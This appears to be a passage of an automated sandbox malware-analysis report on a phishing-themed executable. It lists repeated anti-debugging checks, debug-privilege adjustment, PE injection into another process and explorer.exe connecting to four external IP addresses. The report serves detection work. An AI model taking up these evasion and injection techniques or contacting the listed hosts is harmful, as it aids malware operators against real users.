Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0465740D mov eax, dword ptr fs:[00000030h]	14_2_0465740D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0465740D mov eax, dword ptr fs:[00000030h]	14_2_0465740D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0465740D mov eax, dword ptr fs:[00000030h]	14_2_0465740D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606C0A mov eax, dword ptr fs:[00000030h]	14_2_04606C0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606C0A mov eax, dword ptr fs:[00000030h]	14_2_04606C0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606C0A mov eax, dword ptr fs:[00000030h]	14_2_04606C0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606C0A mov eax, dword ptr fs:[00000030h]	14_2_04606C0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BBC2C mov eax, dword ptr fs:[00000030h]	14_2_045BBC2C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606CF0 mov eax, dword ptr fs:[00000030h]	14_2_04606CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606CF0 mov eax, dword ptr fs:[00000030h]	14_2_04606CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606CF0 mov eax, dword ptr fs:[00000030h]	14_2_04606CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046414FB mov eax, dword ptr fs:[00000030h]	14_2_046414FB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04658CD6 mov eax, dword ptr fs:[00000030h]	14_2_04658CD6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459849B mov eax, dword ptr fs:[00000030h]	14_2_0459849B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A7D50 mov eax, dword ptr fs:[00000030h]	14_2_045A7D50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C3D43 mov eax, dword ptr fs:[00000030h]	14_2_045C3D43
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04603540 mov eax, dword ptr fs:[00000030h]	14_2_04603540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AC577 mov eax, dword ptr fs:[00000030h]	14_2_045AC577
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AC577 mov eax, dword ptr fs:[00000030h]	14_2_045AC577
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04658D34 mov eax, dword ptr fs:[00000030h]	14_2_04658D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0460A537 mov eax, dword ptr fs:[00000030h]	14_2_0460A537
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464E539 mov eax, dword ptr fs:[00000030h]	14_2_0464E539
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B4D3B mov eax, dword ptr fs:[00000030h]	14_2_045B4D3B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B4D3B mov eax, dword ptr fs:[00000030h]	14_2_045B4D3B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B4D3B mov eax, dword ptr fs:[00000030h]	14_2_045B4D3B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458AD30 mov eax, dword ptr fs:[00000030h]	14_2_0458AD30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04593D34 mov eax, dword ptr fs:[00000030h]	14_2_04593D34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0464FDE2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0464FDE2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0464FDE2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0464FDE2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04638DF1 mov eax, dword ptr fs:[00000030h]	14_2_04638DF1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov eax, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov eax, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov eax, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov ecx, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov eax, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04606DC9 mov eax, dword ptr fs:[00000030h]	14_2_04606DC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459D5E0 mov eax, dword ptr fs:[00000030h]	14_2_0459D5E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459D5E0 mov eax, dword ptr fs:[00000030h]	14_2_0459D5E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BFD9B mov eax, dword ptr fs:[00000030h]	14_2_045BFD9B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BFD9B mov eax, dword ptr fs:[00000030h]	14_2_045BFD9B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046505AC mov eax, dword ptr fs:[00000030h]	14_2_046505AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046505AC mov eax, dword ptr fs:[00000030h]	14_2_046505AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04582D8A mov eax, dword ptr fs:[00000030h]	14_2_04582D8A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04582D8A mov eax, dword ptr fs:[00000030h]	14_2_04582D8A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04582D8A mov eax, dword ptr fs:[00000030h]	14_2_04582D8A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04582D8A mov eax, dword ptr fs:[00000030h]	14_2_04582D8A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04582D8A mov eax, dword ptr fs:[00000030h]	14_2_04582D8A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2581 mov eax, dword ptr fs:[00000030h]	14_2_045B2581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2581 mov eax, dword ptr fs:[00000030h]	14_2_045B2581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2581 mov eax, dword ptr fs:[00000030h]	14_2_045B2581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2581 mov eax, dword ptr fs:[00000030h]	14_2_045B2581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_045B1DB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_045B1DB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B1DB5 mov eax, dword ptr fs:[00000030h]	14_2_045B1DB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B35A1 mov eax, dword ptr fs:[00000030h]	14_2_045B35A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04597E41 mov eax, dword ptr fs:[00000030h]	14_2_04597E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464AE44 mov eax, dword ptr fs:[00000030h]	14_2_0464AE44
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464AE44 mov eax, dword ptr fs:[00000030h]	14_2_0464AE44
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AAE73 mov eax, dword ptr fs:[00000030h]	14_2_045AAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AAE73 mov eax, dword ptr fs:[00000030h]	14_2_045AAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AAE73 mov eax, dword ptr fs:[00000030h]	14_2_045AAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AAE73 mov eax, dword ptr fs:[00000030h]	14_2_045AAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AAE73 mov eax, dword ptr fs:[00000030h]	14_2_045AAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459766D mov eax, dword ptr fs:[00000030h]	14_2_0459766D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA61C mov eax, dword ptr fs:[00000030h]	14_2_045BA61C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA61C mov eax, dword ptr fs:[00000030h]	14_2_045BA61C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458C600 mov eax, dword ptr fs:[00000030h]	14_2_0458C600
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458C600 mov eax, dword ptr fs:[00000030h]	14_2_0458C600
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458C600 mov eax, dword ptr fs:[00000030h]	14_2_0458C600
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B8E00 mov eax, dword ptr fs:[00000030h]	14_2_045B8E00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0463FE3F mov eax, dword ptr fs:[00000030h]	14_2_0463FE3F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641608 mov eax, dword ptr fs:[00000030h]	14_2_04641608
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458E620 mov eax, dword ptr fs:[00000030h]	14_2_0458E620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B36CC mov eax, dword ptr fs:[00000030h]	14_2_045B36CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C8EC7 mov eax, dword ptr fs:[00000030h]	14_2_045C8EC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0463FEC0 mov eax, dword ptr fs:[00000030h]	14_2_0463FEC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04658ED6 mov eax, dword ptr fs:[00000030h]	14_2_04658ED6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B16E0 mov ecx, dword ptr fs:[00000030h]	14_2_045B16E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045976E2 mov eax, dword ptr fs:[00000030h]	14_2_045976E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04650EA5 mov eax, dword ptr fs:[00000030h]	14_2_04650EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04650EA5 mov eax, dword ptr fs:[00000030h]	14_2_04650EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04650EA5 mov eax, dword ptr fs:[00000030h]	14_2_04650EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046046A7 mov eax, dword ptr fs:[00000030h]	14_2_046046A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461FE87 mov eax, dword ptr fs:[00000030h]	14_2_0461FE87
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04658F6A mov eax, dword ptr fs:[00000030h]	14_2_04658F6A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459EF40 mov eax, dword ptr fs:[00000030h]	14_2_0459EF40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459FF60 mov eax, dword ptr fs:[00000030h]	14_2_0459FF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AF716 mov eax, dword ptr fs:[00000030h]	14_2_045AF716
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA70E mov eax, dword ptr fs:[00000030h]	14_2_045BA70E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA70E mov eax, dword ptr fs:[00000030h]	14_2_045BA70E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0465070D mov eax, dword ptr fs:[00000030h]	14_2_0465070D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0465070D mov eax, dword ptr fs:[00000030h]	14_2_0465070D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BE730 mov eax, dword ptr fs:[00000030h]	14_2_045BE730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461FF10 mov eax, dword ptr fs:[00000030h]	14_2_0461FF10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461FF10 mov eax, dword ptr fs:[00000030h]	14_2_0461FF10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04584F2E mov eax, dword ptr fs:[00000030h]	14_2_04584F2E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04584F2E mov eax, dword ptr fs:[00000030h]	14_2_04584F2E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C37F5 mov eax, dword ptr fs:[00000030h]	14_2_045C37F5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04598794 mov eax, dword ptr fs:[00000030h]	14_2_04598794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607794 mov eax, dword ptr fs:[00000030h]	14_2_04607794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607794 mov eax, dword ptr fs:[00000030h]	14_2_04607794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607794 mov eax, dword ptr fs:[00000030h]	14_2_04607794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A0050 mov eax, dword ptr fs:[00000030h]	14_2_045A0050
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A0050 mov eax, dword ptr fs:[00000030h]	14_2_045A0050
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04651074 mov eax, dword ptr fs:[00000030h]	14_2_04651074
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04642073 mov eax, dword ptr fs:[00000030h]	14_2_04642073
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04654015 mov eax, dword ptr fs:[00000030h]	14_2_04654015
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04654015 mov eax, dword ptr fs:[00000030h]	14_2_04654015
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459B02A mov eax, dword ptr fs:[00000030h]	14_2_0459B02A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459B02A mov eax, dword ptr fs:[00000030h]	14_2_0459B02A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459B02A mov eax, dword ptr fs:[00000030h]	14_2_0459B02A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459B02A mov eax, dword ptr fs:[00000030h]	14_2_0459B02A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607016 mov eax, dword ptr fs:[00000030h]	14_2_04607016
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607016 mov eax, dword ptr fs:[00000030h]	14_2_04607016
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04607016 mov eax, dword ptr fs:[00000030h]	14_2_04607016
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B002D mov eax, dword ptr fs:[00000030h]	14_2_045B002D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B002D mov eax, dword ptr fs:[00000030h]	14_2_045B002D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B002D mov eax, dword ptr fs:[00000030h]	14_2_045B002D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B002D mov eax, dword ptr fs:[00000030h]	14_2_045B002D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B002D mov eax, dword ptr fs:[00000030h]	14_2_045B002D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov ecx, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0461B8D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045858EC mov eax, dword ptr fs:[00000030h]	14_2_045858EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589080 mov eax, dword ptr fs:[00000030h]	14_2_04589080
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BF0BF mov ecx, dword ptr fs:[00000030h]	14_2_045BF0BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BF0BF mov eax, dword ptr fs:[00000030h]	14_2_045BF0BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BF0BF mov eax, dword ptr fs:[00000030h]	14_2_045BF0BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04603884 mov eax, dword ptr fs:[00000030h]	14_2_04603884
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04603884 mov eax, dword ptr fs:[00000030h]	14_2_04603884
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C90AF mov eax, dword ptr fs:[00000030h]	14_2_045C90AF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0 mov eax, dword ptr fs:[00000030h]	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AB944 mov eax, dword ptr fs:[00000030h]	14_2_045AB944
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AB944 mov eax, dword ptr fs:[00000030h]	14_2_045AB944
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458B171 mov eax, dword ptr fs:[00000030h]	14_2_0458B171
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458B171 mov eax, dword ptr fs:[00000030h]	14_2_0458B171
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458C962 mov eax, dword ptr fs:[00000030h]	14_2_0458C962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589100 mov eax, dword ptr fs:[00000030h]	14_2_04589100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589100 mov eax, dword ptr fs:[00000030h]	14_2_04589100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589100 mov eax, dword ptr fs:[00000030h]	14_2_04589100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B513A mov eax, dword ptr fs:[00000030h]	14_2_045B513A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B513A mov eax, dword ptr fs:[00000030h]	14_2_045B513A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120 mov ecx, dword ptr fs:[00000030h]	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046141E8 mov eax, dword ptr fs:[00000030h]	14_2_046141E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0458B1E1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0458B1E1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]	14_2_0458B1E1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046069A6 mov eax, dword ptr fs:[00000030h]	14_2_046069A6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2990 mov eax, dword ptr fs:[00000030h]	14_2_045B2990
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045AC182 mov eax, dword ptr fs:[00000030h]	14_2_045AC182
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA185 mov eax, dword ptr fs:[00000030h]	14_2_045BA185
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]	14_2_046051BE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]	14_2_046051BE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]	14_2_046051BE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]	14_2_046051BE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B61A0 mov eax, dword ptr fs:[00000030h]	14_2_045B61A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B61A0 mov eax, dword ptr fs:[00000030h]	14_2_045B61A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0463B260 mov eax, dword ptr fs:[00000030h]	14_2_0463B260
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0463B260 mov eax, dword ptr fs:[00000030h]	14_2_0463B260
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04658A62 mov eax, dword ptr fs:[00000030h]	14_2_04658A62
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]	14_2_04589240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]	14_2_04589240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]	14_2_04589240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]	14_2_04589240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C927A mov eax, dword ptr fs:[00000030h]	14_2_045C927A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464EA55 mov eax, dword ptr fs:[00000030h]	14_2_0464EA55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04614257 mov eax, dword ptr fs:[00000030h]	14_2_04614257
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A3A1C mov eax, dword ptr fs:[00000030h]	14_2_045A3A1C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]	14_2_04585210
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04585210 mov ecx, dword ptr fs:[00000030h]	14_2_04585210
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]	14_2_04585210
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]	14_2_04585210
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458AA16 mov eax, dword ptr fs:[00000030h]	14_2_0458AA16
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458AA16 mov eax, dword ptr fs:[00000030h]	14_2_0458AA16
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04598A0A mov eax, dword ptr fs:[00000030h]	14_2_04598A0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C4A2C mov eax, dword ptr fs:[00000030h]	14_2_045C4A2C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C4A2C mov eax, dword ptr fs:[00000030h]	14_2_045C4A2C

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.92.73.140 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 165.160.13.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.24.109.70 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Memory written: C:\Users\user\Desktop\Po-covid19 2372#w2..exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

